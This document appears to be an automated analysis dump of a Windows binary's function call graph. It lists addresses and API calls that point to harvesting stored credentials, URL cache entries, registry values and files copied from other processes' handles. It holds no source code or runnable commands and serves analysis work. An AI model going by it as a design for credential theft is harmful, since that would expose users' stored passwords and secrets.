38177->38614 38178 44589f 38630 40b1ab free free 38178->38630 38184 414c2e 14 API calls 38179->38184 38180->38179 38192 445ba2 38180->38192 38181 4456b2 38617 40b1ab free free 38181->38617 38182 40b2cc 27 API calls 38194 445a4f 38182->38194 38197 445be2 38184->38197 38185 403335 38331 4452e5 45 API calls 38185->38331 38200 445919 38186->38200 38615 4454bf 20 API calls 38187->38615 38188 445823 38188->38169 38209 4087b3 337 API calls 38188->38209 38201 409d1f 6 API calls 38189->38201 38202 445cc9 38190->38202 38700 4099c6 wcslen 38192->38700 38579 409d1f wcslen wcslen 38194->38579 38195->38148 38228 44594a 38195->38228 38207 40b2cc 27 API calls 38197->38207 38198 445d3d 38227 40b2cc 27 API calls 38198->38227 38199 445d88 memset memset memset 38210 414c2e 14 API calls 38199->38210 38631 409b98 GetFileAttributesW 38200->38631 38211 4459bc 38201->38211 38212 409d1f 6 API calls 38202->38212 38203 445879 38203->38178 38214 4087b3 337 API calls 38203->38214 38204 445bb3 38703 445403 memset 38204->38703 38205 445680 38205->38181 38452 4087b3 memset 38205->38452 38217 445bf3 38207->38217 38209->38188 38220 445dde 38210->38220 38696 409b98 GetFileAttributesW 38211->38696 38213 445ce1 38212->38213 38720 409b98 GetFileAttributesW 38213->38720 38214->38203 38226 409d1f 6 API calls 38217->38226 38218 445928 38218->38228 38632 40b6ef 38218->38632 38229 40b2cc 27 API calls 38220->38229 38225 40b2cc 27 API calls 38233 445a94 38225->38233 38235 445c07 38226->38235 38236 445d54 _wcsicmp 38227->38236 38228->38151 38240 4459ed 38228->38240 38239 445def 38229->38239 38230 4459cb 38230->38240 38247 40b6ef 249 API calls 38230->38247 38231->38185 38231->38198 38231->38199 38232 445389 255 API calls 38232->38167 38584 40ae18 38233->38584 38234 44566d 38234->38147 38503 413d4c 38234->38503 38243 445389 255 API calls 38235->38243 38244 445d71 38236->38244 38308 445d67 38236->38308 38238 445665 38616 40b1ab free free 38238->38616 38245 409d1f 6 API calls 38239->38245 38240->38154 38282 445b22 38240->38282 38249 445c17 38243->38249 38721 445093 23 API calls 38244->38721 38252 445e03 38245->38252 38247->38240 38248 4456d8 38254 40b2cc 27 API calls 38248->38254 38255 40b2cc 27 API calls 38249->38255 38251 44563c 38251->38238 38257 4087b3 337 API calls 38251->38257 38722 409b98 GetFileAttributesW 38252->38722 38253 40b6ef 249 API calls 38253->38185 38259 4456e2 38254->38259 38260 445c23 38255->38260 38256 445d83 38256->38185 38257->38251 38618 413fa6 _wcsicmp _wcsicmp 38259->38618 38264 409d1f 6 API calls 38260->38264 38262 445e12 38269 445e6b 38262->38269 38276 40b2cc 27 API calls 38262->38276 38267 445c37 38264->38267 38265 445aa1 38268 445b17 38265->38268 38285 445ab2 memset 38265->38285 38299 409d1f 6 API calls 38265->38299 38591 40add4 38265->38591 38596 445389 38265->38596 38605 40ae51 38265->38605 38266 4456eb 38272 4456fd memset memset memset memset 38266->38272 38273 4457ea 38266->38273 38274 445389 255 API calls 38267->38274 38697 40aebe 38268->38697 38724 445093 23 API calls 38269->38724 38619 409c70 wcscpy wcsrchr 38272->38619 38622 413d29 38273->38622 38281 445c47 38274->38281 38277 445e33 38276->38277 38283 409d1f 6 API calls 38277->38283 38279 445e7e 38284 445f67 38279->38284 38287 40b2cc 27 API calls 38281->38287 38282->38167 38282->38168 38288 445e47 38283->38288 38289 40b2cc 27 API calls 38284->38289 38290 40b2cc 27 API calls 38285->38290 38292 445c53 38287->38292 38723 409b98 GetFileAttributesW 38288->38723 38294 445f73 38289->38294 38290->38265 38291 409c70 2 API calls 38295 44577e 38291->38295 38296 409d1f 6 API calls 38292->38296 38298 409d1f 6 API calls 38294->38298 38300 409c70 2 API calls 38295->38300 38301 445c67 38296->38301 38297 445e56 38297->38269 38305 445e83 memset 38297->38305 38302 445f87 38298->38302 38299->38265 38303 44578d 38300->38303 38304 445389 255 API calls 38301->38304 38727 409b98 GetFileAttributesW 38302->38727 38303->38273 38310 40b2cc 27 API calls 38303->38310 38304->38167 38309 40b2cc 27 API calls 38305->38309 38308->38185 38308->38253 38311 445eab 38309->38311 38312 4457a8 38310->38312 38313 409d1f 6 API calls 38311->38313 38314 409d1f 6 API calls 38312->38314 38315 445ebf 38313->38315 38316 4457b8 38314->38316 38317 40ae18 9 API calls 38315->38317 38621 409b98 GetFileAttributesW 38316->38621 38327 445ef5 38317->38327 38319 4457c7 38319->38273 38320 4087b3 337 API calls 38319->38320 38320->38273 38321 40ae51 9 API calls 38321->38327 38322 445f5c 38323 40aebe FindClose 38322->38323 38323->38284 38324 40add4 2 API calls 38324->38327 38325 40b2cc 27 API calls 38325->38327 38326 409d1f 6 API calls 38326->38327 38327->38321 38327->38322 38327->38324 38327->38325 38327->38326 38329 445f3a 38327->38329 38725 409b98 GetFileAttributesW 38327->38725 38726 445093 23 API calls 38329->38726 38331->38128 38332->38131 38333->38128 38334->38123 38336 40c775 38335->38336 38728 40b1ab free free 38336->38728 38338 40c788 38729 40b1ab free free 38338->38729 38340 40c790 38730 40b1ab free free 38340->38730 38342 40c798 38343 40aa04 free 38342->38343 38344 40c7a0 38343->38344 38731 40c274 memset 38344->38731 38349 40a8ab 9 API calls 38350 40c7c3 38349->38350 38351 40a8ab 9 API calls 38350->38351 38352 40c7d0 38351->38352 38760 40c3c3 38352->38760 38356 40c877 38365 40bdb0 38356->38365 38357 40c86c 38786 4053fe 39 API calls 38357->38786 38360 40c813 _wcslwr 38784 40c634 49 API calls 38360->38784 38362 40c829 wcslen 38363 40c7e5 38362->38363 38363->38356 38363->38357 38783 40a706 wcslen memcpy 38363->38783 38785 40c634 49 API calls 38363->38785 38949 404363 38365->38949 38369 40bdee 38372 40b2cc 27 API calls 38369->38372 38374 40bf5d 38369->38374 38370 40bddf CredEnumerateW 38370->38369 38373 40be02 wcslen 38372->38373 38373->38374 38382 40be1e 38373->38382 38969 40440c 38374->38969 38375 40be26 wcsncmp 38375->38382 38378 40be7d memset 38379 40bea7 memcpy 38378->38379 38378->38382 38380 40bf11 wcschr 38379->38380 38379->38382 38380->38382 38381 40b2cc 27 API calls 38383 40bef6 _wcsnicmp 38381->38383 38382->38374 38382->38375 38382->38378 38382->38379 38382->38380 38382->38381 38384 40bf43 LocalFree 38382->38384 38972 40bd5d 28 API calls 38382->38972 38973 404423 38382->38973 38383->38380 38383->38382 38384->38382 38385 4135f7 38986 4135e0 38385->38986 38388 40b2cc 27 API calls 38389 41360d 38388->38389 38390 40a804 8 API calls 38389->38390 38391 413613 38390->38391 38392 41361b 38391->38392 38393 41363e 38391->38393 38395 40b273 27 API calls 38392->38395 38394 4135e0 FreeLibrary 38393->38394 38397 413643 38394->38397 38396 413625 GetProcAddress 38395->38396 38396->38393 38398 413648 38396->38398 38397->38158 38399 413658 38398->38399 38400 4135e0 FreeLibrary 38398->38400 38399->38158 38401 413666 38400->38401 38401->38158 38989 4449b9 38402->38989 38405 444c1f 38405->38138 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39010 444972 GetVersionExW 38408->39010 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39014 444a85 42 API calls 38412->39014 38416->38411 38416->38412 39011 444aa5 42 API calls 38416->39011 39012 40a7a0 GetVersionExW 38416->39012 39013 444a85 42 API calls 38416->39013 38419 40399d 38418->38419 39015 403a16 38419->39015 38421 403a09 39029 40b1ab free free 38421->39029 38423 403a12 wcsrchr 38423->38145 38424 4039a3 38424->38421 38427 4039f4 38424->38427 39026 40a02c CreateFileW 38424->39026 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 14 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 14 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39056 40414f memset 38443->39056 38445 4040e0 38446 404140 38445->38446 38448 4040ec memset 38445->38448 38450 4099c6 2 API calls 38445->38450 38451 40a8ab 9 API calls 38445->38451 39070 40b1ab free free 38446->39070 38448->38445 38449 404148 38449->38205 38450->38445 38451->38445 39083 40a6e6 WideCharToMultiByte 38452->39083 38454 4087ed 39084 4095d9 memset 38454->39084 38457 408809 memset memset memset memset memset 38458 40b2cc 27 API calls 38457->38458 38459 4088a1 38458->38459 38460 409d1f 6 API calls 38459->38460 38461 4088b1 38460->38461 38462 40b2cc 27 API calls 38461->38462 38463 4088c0 38462->38463 38464 409d1f 6 API calls 38463->38464 38465 4088d0 38464->38465 38466 40b2cc 27 API calls 38465->38466 38467 4088df 38466->38467 38468 409d1f 6 API calls 38467->38468 38469 4088ef 38468->38469 38470 40b2cc 27 API calls 38469->38470 38471 4088fe 38470->38471 38472 409d1f 6 API calls 38471->38472 38473 40890e 38472->38473 38474 40b2cc 27 API calls 38473->38474 38475 40891d 38474->38475 38476 409d1f 6 API calls 38475->38476 38477 40892d 38476->38477 39103 409b98 GetFileAttributesW 38477->39103 38479 40893e 38480 408943 38479->38480 38481 408958 38479->38481 39104 407fdf 75 API calls 38480->39104 39105 409b98 GetFileAttributesW 38481->39105 38484 408964 38485 408969 38484->38485 38486 40897b 38484->38486 39106 4082c7 198 API calls 38485->39106 39107 409b98 GetFileAttributesW 38486->39107 38489 408987 38490 4089a1 38489->38490 38491 40898c 38489->38491 39109 409b98 GetFileAttributesW 38490->39109 39108 408560 29 API calls 38491->39108 38494 4089ad 38495 4089b2 38494->38495 38496 4089c7 38494->38496 39111 409b98 GetFileAttributesW 38496->39111 38501 408953 38501->38205 38504 40b633 free 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413df3 memset 38507->38509 38512 413eb0 38507->38512 38508->38248 39383 413f27 38509->39383 38511 413ebf free 38511->38512 38512->38506 38512->38511 38513 4099f4 3 API calls 38512->38513 38513->38512 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38517 413e1f 38514->38517 38516->38517 38517->38514 39388 413959 38517->39388 39404 413ca4 38517->39404 38519 413ea2 CloseHandle 38519->38512 38521 414c2e 14 API calls 38520->38521 38522 403eb7 38521->38522 38523 414c2e 14 API calls 38522->38523 38524 403ec5 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403ee2 38525->38526 38527 409d1f 6 API calls 38526->38527 38528 403efd 38527->38528 38529 409d1f 6 API calls 38528->38529 38530 403f15 38529->38530 38531 403af5 20 API calls 38530->38531 38532 403f29 38531->38532 38533 403af5 20 API calls 38532->38533 38534 403f3a 38533->38534 38535 40414f 33 API calls 38534->38535 38536 403f4f 38535->38536 38537 403faf 38536->38537 38539 403f5b memset 38536->38539 38541 4099c6 2 API calls 38536->38541 38542 40a8ab 9 API calls 38536->38542 39418 40b1ab free free 38537->39418 38539->38536 38540 403fb7 38540->38188 38541->38536 38542->38536 38544 414c2e 14 API calls 38543->38544 38545 403d26 38544->38545 38546 414c2e 14 API calls 38545->38546 38547 403d34 38546->38547 38548 409d1f 6 API calls 38547->38548 38549 403d51 38548->38549 38550 409d1f 6 API calls 38549->38550 38551 403d6c 38550->38551 38552 409d1f 6 API calls 38551->38552 38553 403d84 38552->38553 38554 403af5 20 API calls 38553->38554 38555 403d98 38554->38555 38556 403af5 20 API calls 38555->38556 38557 403da9 38556->38557 38558 40414f 33 API calls 38557->38558 38564 403dbe 38558->38564 38559 403e1e 39419 40b1ab free free 38559->39419 38560 403dca memset 38560->38564 38562 403e26 38562->38203 38563 4099c6 2 API calls 38563->38564 38564->38559 38564->38560 38564->38563 38565 40a8ab 9 API calls 38564->38565 38565->38564 38567 414b81 9 API calls 38566->38567 38568 414c40 38567->38568 38569 414c73 memset 38568->38569 39420 409cea 38568->39420 38573 414c94 38569->38573 38572 414c64 38572->38182 38574 414cf4 wcscpy 38573->38574 39423 414bb0 wcscpy 38573->39423 38574->38572 38576 414cd2 39424 4145ac RegQueryValueExW 38576->39424 38578 414ce9 38578->38574 38580 409d62 38579->38580 38581 409d43 wcscpy 38579->38581 38580->38225 38582 409719 2 API calls 38581->38582 38583 409d51 wcscat 38582->38583 38583->38580 38585 40aebe FindClose 38584->38585 38586 40ae21 38585->38586 38587 4099c6 2 API calls 38586->38587 38588 40ae35 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 40ae49 38589->38590 38590->38265 38592 40ade0 38591->38592 38593 40ae0f 38591->38593 38592->38593 38594 40ade7 wcscmp 38592->38594 38593->38265 38594->38593 38595 40adfe wcscmp 38594->38595 38595->38593 38597 40ae18 9 API calls 38596->38597 38599 4453c4 38597->38599 38598 40ae51 9 API calls 38598->38599 38599->38598 38600 4453f3 38599->38600 38601 40add4 2 API calls 38599->38601 38604 445403 250 API calls 38599->38604 38602 40aebe FindClose 38600->38602 38601->38599 38603 4453fe 38602->38603 38603->38265 38604->38599 38606 40ae7b FindNextFileW 38605->38606 38607 40ae5c FindFirstFileW 38605->38607 38608 40ae94 38606->38608 38609 40ae8f 38606->38609 38607->38608 38611 40aeb6 38608->38611 38612 409d1f 6 API calls 38608->38612 38610 40aebe FindClose 38609->38610 38610->38608 38611->38265 38612->38611 38613->38177 38614->38157 38615->38251 38616->38234 38617->38234 38618->38266 38620 409c89 38619->38620 38620->38291 38621->38319 38623 413d39 38622->38623 38624 413d2f FreeLibrary 38622->38624 38625 40b633 free 38623->38625 38624->38623 38626 413d42 38625->38626 38627 40b633 free 38626->38627 38628 413d4a 38627->38628 38628->38147 38629->38150 38630->38195 38631->38218 38633 44db70 38632->38633 38634 40b6fc memset 38633->38634 38635 409c70 2 API calls 38634->38635 38636 40b732 wcsrchr 38635->38636 38637 40b743 38636->38637 38638 40b746 memset 38636->38638 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 40b76f 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 40b783 38641->38642 39425 409b98 GetFileAttributesW 38642->39425 38644 40b792 38645 40b7c2 38644->38645 38647 409c70 2 API calls 38644->38647 39426 40bb98 38645->39426 38649 40b7a5 38647->38649 38650 40b2cc 27 API calls 38649->38650 38653 40b7b2 38650->38653 38651 40b837 CloseHandle 38655 40b83e memset 38651->38655 38652 40b817 39460 409a45 GetTempPathW 38652->39460 38656 409d1f 6 API calls 38653->38656 39459 40a6e6 WideCharToMultiByte 38655->39459 38656->38645 38657 40b827 38657->38655 38659 40b866 38660 444432 120 API calls 38659->38660 38661 40b879 38660->38661 38662 40b273 27 API calls 38661->38662 38663 40bad5 38661->38663 38664 40b89a 38662->38664 38665 40b04b ??3@YAXPAX 38663->38665 38666 438552 133 API calls 38664->38666 38667 40baf3 38665->38667 38668 40b8a4 38666->38668 38667->38228 38669 40bacd 38668->38669 38671 4251c4 136 API calls 38668->38671 38670 443d90 110 API calls 38669->38670 38670->38663 38694 40b8b8 38671->38694 38672 40bac6 39472 424f26 122 API calls 38672->39472 38673 40b8bd memset 39463 425413 17 API calls 38673->39463 38676 425413 17 API calls 38676->38694 38679 40a71b MultiByteToWideChar 38679->38694 38680 40a734 MultiByteToWideChar 38680->38694 38683 40b9b5 memcmp 38683->38694 38684 4099c6 2 API calls 38684->38694 38685 404423 37 API calls 38685->38694 38688 4251c4 136 API calls 38688->38694 38689 40bb3e memset memcpy 39473 40a734 MultiByteToWideChar 38689->39473 38691 40bb88 LocalFree 38691->38694 38694->38672 38694->38673 38694->38676 38694->38679 38694->38680 38694->38683 38694->38684 38694->38685 38694->38688 38694->38689 38695 40ba5f memcmp 38694->38695 39464 4253ef 16 API calls 38694->39464 39465 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38694->39465 39466 4253af 17 API calls 38694->39466 39467 4253cf 17 API calls 38694->39467 39468 447280 memset 38694->39468 39469 447960 memset memcpy memcpy memcpy 38694->39469 39470 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38694->39470 39471 447920 memcpy memcpy memcpy 38694->39471 38695->38694 38696->38230 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38282 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39562 409b98 GetFileAttributesW 38707->39562 38709 44545e 38710 445476 38709->38710 38712 40b6ef 249 API calls 38709->38712 38711 40b2cc 27 API calls 38710->38711 38713 445482 38711->38713 38712->38710 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39563 409b98 GetFileAttributesW 38715->39563 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 249 API calls 38717->38719 38718->38232 38719->38718 38720->38231 38721->38256 38722->38262 38723->38297 38724->38279 38725->38327 38726->38327 38727->38308 38728->38338 38729->38340 38730->38342 38732 414c2e 14 API calls 38731->38732 38733 40c2ae 38732->38733 38787 40c1d3 38733->38787 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38754 40c391 FindNextUrlCacheEntryW 38751->38754 38753 40a8ab 9 API calls 38752->38753 38753->38745 38754->38742 38754->38748 38881 40a97a 38755->38881 38758 40a8cc 38758->38349 38887 40b1ab free free 38760->38887 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38765 40c50e 38764->38765 38766 40c3ff 38764->38766 38780 405337 38765->38780 38767 40a9ce 4 API calls 38766->38767 38768 40c418 memset 38767->38768 38888 40aa1d 38768->38888 38771 40c471 38773 40c47a _wcsupr 38771->38773 38772 40c505 38772->38765 38890 40a8d0 7 API calls 38773->38890 38775 40c498 38891 40a8d0 7 API calls 38775->38891 38777 40c4ac memset 38778 40aa1d 38777->38778 38779 40c4e4 RegEnumValueW 38778->38779 38779->38772 38779->38773 38892 405220 38780->38892 38783->38360 38784->38362 38785->38363 38786->38356 38788 40ae18 9 API calls 38787->38788 38794 40c210 38788->38794 38789 40ae51 9 API calls 38789->38794 38790 40c264 38791 40aebe FindClose 38790->38791 38793 40c26f 38791->38793 38792 40add4 2 API calls 38792->38794 38799 40e5ed memset memset 38793->38799 38794->38789 38794->38790 38794->38792 38795 40c231 _wcsicmp 38794->38795 38797 40c1d3 34 API calls 38794->38797 38795->38794 38796 40c248 38795->38796 38812 40c084 21 API calls 38796->38812 38797->38794 38800 414c2e 14 API calls 38799->38800 38801 40e63f 38800->38801 38802 409d1f 6 API calls 38801->38802 38803 40e658 38802->38803 38813 409b98 GetFileAttributesW 38803->38813 38805 40e667 38806 409d1f 6 API calls 38805->38806 38808 40e680 38805->38808 38806->38808 38814 409b98 GetFileAttributesW 38808->38814 38809 40e68f 38810 40c2d8 38809->38810 38815 40e4b2 38809->38815 38810->38738 38810->38739 38812->38794 38813->38805 38814->38809 38836 40e01e 38815->38836 38817 40e593 38818 40e5b0 38817->38818 38819 40e59c DeleteFileW 38817->38819 38820 40b04b ??3@YAXPAX 38818->38820 38819->38818 38822 40e5bb 38820->38822 38821 40e521 38821->38817 38859 40e175 38821->38859 38824 40e5c4 CloseHandle 38822->38824 38825 40e5cc 38822->38825 38824->38825 38826 40b633 free 38825->38826 38828 40e5db 38826->38828 38827 40e573 38829 40e584 38827->38829 38830 40e57c CloseHandle 38827->38830 38832 40b633 free 38828->38832 38880 40b1ab free free 38829->38880 38830->38829 38831 40e540 38831->38827 38879 40e2ab 30 API calls 38831->38879 38834 40e5e3 38832->38834 38834->38810 38837 406214 22 API calls 38836->38837 38838 40e03c 38837->38838 38839 40e16b 38838->38839 38840 40dd85 74 API calls 38838->38840 38839->38821 38841 40e06b 38840->38841 38841->38839 38842 40afcf ??2@YAPAXI ??3@YAXPAX 38841->38842 38843 40e08d OpenProcess 38842->38843 38844 40e0a4 GetCurrentProcess DuplicateHandle 38843->38844 38848 40e152 38843->38848 38845 40e0d0 GetFileSize 38844->38845 38846 40e14a CloseHandle 38844->38846 38849 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38845->38849 38846->38848 38847 40e160 38851 40b04b ??3@YAXPAX 38847->38851 38848->38847 38850 406214 22 API calls 38848->38850 38852 40e0ea 38849->38852 38850->38847 38851->38839 38853 4096dc CreateFileW 38852->38853 38854 40e0f1 CreateFileMappingW 38853->38854 38855 40e140 CloseHandle CloseHandle 38854->38855 38856 40e10b MapViewOfFile 38854->38856 38855->38846 38857 40e13b CloseHandle 38856->38857 38858 40e11f WriteFile UnmapViewOfFile 38856->38858 38857->38855 38858->38857 38860 40e18c 38859->38860 38861 406b90 11 API calls 38860->38861 38862 40e19f 38861->38862 38863 40e1a7 memset 38862->38863 38864 40e299 38862->38864 38869 40e1e8 38863->38869 38865 4069a3 ??3@YAXPAX free 38864->38865 38866 40e2a4 38865->38866 38866->38831 38867 406e8f 13 API calls 38867->38869 38868 406b53 SetFilePointerEx ReadFile 38868->38869 38869->38867 38869->38868 38870 40e283 38869->38870 38871 40dd50 _wcsicmp 38869->38871 38875 40742e 8 API calls 38869->38875 38876 40aae3 wcslen wcslen _memicmp 38869->38876 38877 40e244 _snwprintf 38869->38877 38872 40e291 38870->38872 38873 40e288 free 38870->38873 38871->38869 38874 40aa04 free 38872->38874 38873->38872 38874->38864 38875->38869 38876->38869 38878 40a8d0 7 API calls 38877->38878 38878->38869 38879->38831 38880->38817 38882 40a980 38881->38882 38883 40a995 _wcsicmp 38882->38883 38884 40a99c wcscmp 38882->38884 38885 40a8bb 38882->38885 38883->38882 38884->38882 38885->38758 38886 40a8d0 7 API calls 38885->38886 38886->38758 38887->38762 38889 40aa23 RegEnumValueW 38888->38889 38889->38771 38889->38772 38890->38775 38891->38777 38893 405335 38892->38893 38894 40522a 38892->38894 38893->38363 38895 40b2cc 27 API calls 38894->38895 38896 405234 38895->38896 38897 40a804 8 API calls 38896->38897 38898 40523a 38897->38898 38937 40b273 38898->38937 38900 405248 _mbscpy _mbscat GetProcAddress 38901 40b273 27 API calls 38900->38901 38902 405279 38901->38902 38940 405211 GetProcAddress 38902->38940 38904 405282 38905 40b273 27 API calls 38904->38905 38906 40528f 38905->38906 38941 405211 GetProcAddress 38906->38941 38908 405298 38909 40b273 27 API calls 38908->38909 38910 4052a5 38909->38910 38942 405211 GetProcAddress 38910->38942 38912 4052ae 38913 40b273 27 API calls 38912->38913 38914 4052bb 38913->38914 38943 405211 GetProcAddress 38914->38943 38916 4052c4 38917 40b273 27 API calls 38916->38917 38918 4052d1 38917->38918 38944 405211 GetProcAddress 38918->38944 38920 4052da 38921 40b273 27 API calls 38920->38921 38922 4052e7 38921->38922 38945 405211 GetProcAddress 38922->38945 38924 4052f0 38925 40b273 27 API calls 38924->38925 38926 4052fd 38925->38926 38946 405211 GetProcAddress 38926->38946 38928 405306 38929 40b273 27 API calls 38928->38929 38930 405313 38929->38930 38947 405211 GetProcAddress 38930->38947 38932 40531c 38933 40b273 27 API calls 38932->38933 38934 405329 38933->38934 38948 405211 GetProcAddress 38934->38948 38936 405332 38936->38893 38938 40b58d 27 API calls 38937->38938 38939 40b18c 38938->38939 38939->38900 38940->38904 38941->38908 38942->38912 38943->38916 38944->38920 38945->38924 38946->38928 38947->38932 38948->38936 38950 40440c FreeLibrary 38949->38950 38951 40436d 38950->38951 38952 40a804 8 API calls 38951->38952 38953 404377 38952->38953 38954 404383 38953->38954 38955 404405 38953->38955 38956 40b273 27 API calls 38954->38956 38955->38369 38955->38370 38955->38374 38957 40438d GetProcAddress 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4043a7 GetProcAddress 38958->38959 38960 40b273 27 API calls 38959->38960 38961 4043ba GetProcAddress 38960->38961 38962 40b273 27 API calls 38961->38962 38963 4043ce GetProcAddress 38962->38963 38964 40b273 27 API calls 38963->38964 38965 4043e2 GetProcAddress 38964->38965 38966 4043f1 38965->38966 38967 4043f7 38966->38967 38968 40440c FreeLibrary 38966->38968 38967->38955 38968->38955 38970 404413 FreeLibrary 38969->38970 38971 40441e 38969->38971 38970->38971 38971->38385 38972->38382 38974 40447e 38973->38974 38975 40442e 38973->38975 38974->38382 38976 40b2cc 27 API calls 38975->38976 38977 404438 38976->38977 38978 40a804 8 API calls 38977->38978 38979 40443e 38978->38979 38980 404445 38979->38980 38981 404467 38979->38981 38982 40b273 27 API calls 38980->38982 38981->38974 38984 404475 FreeLibrary 38981->38984 38983 40444f GetProcAddress 38982->38983 38983->38981 38985 404460 38983->38985 38984->38974 38985->38981 38987 4135f6 38986->38987 38988 4135eb FreeLibrary 38986->38988 38987->38388 38988->38987 38990 4449c4 38989->38990 38991 444a52 38989->38991 38992 40b2cc 27 API calls 38990->38992 38991->38405 38991->38406 38993 4449cb 38992->38993 38994 40a804 8 API calls 38993->38994 38995 4449d1 38994->38995 38996 40b273 27 API calls 38995->38996 38997 4449dc GetProcAddress 38996->38997 38998 40b273 27 API calls 38997->38998 38999 4449f3 GetProcAddress 38998->38999 39000 40b273 27 API calls 38999->39000 39001 444a04 GetProcAddress 39000->39001 39002 40b273 27 API calls 39001->39002 39003 444a15 GetProcAddress 39002->39003 39004 40b273 27 API calls 39003->39004 39005 444a26 GetProcAddress 39004->39005 39006 40b273 27 API calls 39005->39006 39007 444a37 GetProcAddress 39006->39007 39008 40b273 27 API calls 39007->39008 39009 444a48 GetProcAddress 39008->39009 39009->38991 39010->38416 39011->38416 39012->38416 39013->38416 39014->38407 39016 403a29 39015->39016 39030 403bed memset memset 39016->39030 39018 403ae7 39043 40b1ab free free 39018->39043 39019 403a3f memset 39023 403a2f 39019->39023 39021 403aef 39021->38424 39022 409d1f 6 API calls 39022->39023 39023->39018 39023->39019 39023->39022 39024 409b98 GetFileAttributesW 39023->39024 39025 40a8d0 7 API calls 39023->39025 39024->39023 39025->39023 39027 40a051 GetFileTime CloseHandle 39026->39027 39028 4039ca CompareFileTime 39026->39028 39027->39028 39028->38424 39029->38423 39031 414c2e 14 API calls 39030->39031 39032 403c38 39031->39032 39033 409719 2 API calls 39032->39033 39034 403c3f wcscat 39033->39034 39035 414c2e 14 API calls 39034->39035 39036 403c61 39035->39036 39037 409719 2 API calls 39036->39037 39038 403c68 wcscat 39037->39038 39044 403af5 39038->39044 39041 403af5 20 API calls 39042 403c95 39041->39042 39042->39023 39043->39021 39045 403b02 39044->39045 39046 40ae18 9 API calls 39045->39046 39055 403b37 39046->39055 39047 403bdb 39049 40aebe FindClose 39047->39049 39048 40add4 wcscmp wcscmp 39048->39055 39050 403be6 39049->39050 39050->39041 39051 40a8d0 7 API calls 39051->39055 39052 40ae18 9 API calls 39052->39055 39053 40ae51 9 API calls 39053->39055 39054 40aebe FindClose 39054->39055 39055->39047 39055->39048 39055->39051 39055->39052 39055->39053 39055->39054 39057 409d1f 6 API calls 39056->39057 39058 404190 39057->39058 39071 409b98 GetFileAttributesW 39058->39071 39060 40419c 39061 4041a7 6 API calls 39060->39061 39062 40435c 39060->39062 39063 40424f 39061->39063 39062->38445 39063->39062 39065 40425e memset 39063->39065 39067 409d1f 6 API calls 39063->39067 39068 40a8ab 9 API calls 39063->39068 39072 414842 39063->39072 39065->39063 39066 404296 wcscpy 39065->39066 39066->39063 39067->39063 39069 4042b6 memset memset _snwprintf wcscpy 39068->39069 39069->39063 39070->38449 39071->39060 39075 41443e 39072->39075 39074 414866 39074->39063 39076 41444b 39075->39076 39077 414451 39076->39077 39078 4144a3 GetPrivateProfileStringW 39076->39078 39079 414491 39077->39079 39080 414455 wcschr 39077->39080 39078->39074 39082 414495 WritePrivateProfileStringW 39079->39082 39080->39079 39081 414463 _snwprintf 39080->39081 39081->39082 39082->39074 39083->38454 39085 40b2cc 27 API calls 39084->39085 39086 409615 39085->39086 39087 409d1f 6 API calls 39086->39087 39088 409625 39087->39088 39113 409b98 GetFileAttributesW 39088->39113 39090 409634 39091 409648 39090->39091 39114 4091b8 memset 39090->39114 39093 40b2cc 27 API calls 39091->39093 39095 408801 39091->39095 39094 40965d 39093->39094 39096 409d1f 6 API calls 39094->39096 39095->38457 39095->38501 39097 40966d 39096->39097 39166 409b98 GetFileAttributesW 39097->39166 39099 40967c 39099->39095 39100 409681 39099->39100 39167 409529 72 API calls 39100->39167 39102 409690 39102->39095 39103->38479 39104->38501 39105->38484 39106->38501 39107->38489 39108->38490 39109->38494 39113->39090 39168 40a6e6 WideCharToMultiByte 39114->39168 39116 409202 39169 444432 39116->39169 39119 40b273 27 API calls 39120 409236 39119->39120 39215 438552 39120->39215 39123 409383 39125 40b273 27 API calls 39123->39125 39126 409399 39125->39126 39129 438552 133 API calls 39126->39129 39127 40937b 39240 424f26 122 API calls 39127->39240 39128 409254 39128->39127 39236 4253cf 17 API calls 39128->39236 39148 4093a3 39129->39148 39132 4094ff 39244 443d90 39132->39244 39133 409267 39237 4253cf 17 API calls 39133->39237 39136 4251c4 136 API calls 39136->39148 39137 409273 39238 4253af 17 API calls 39137->39238 39138 409507 39145 40951d 39138->39145 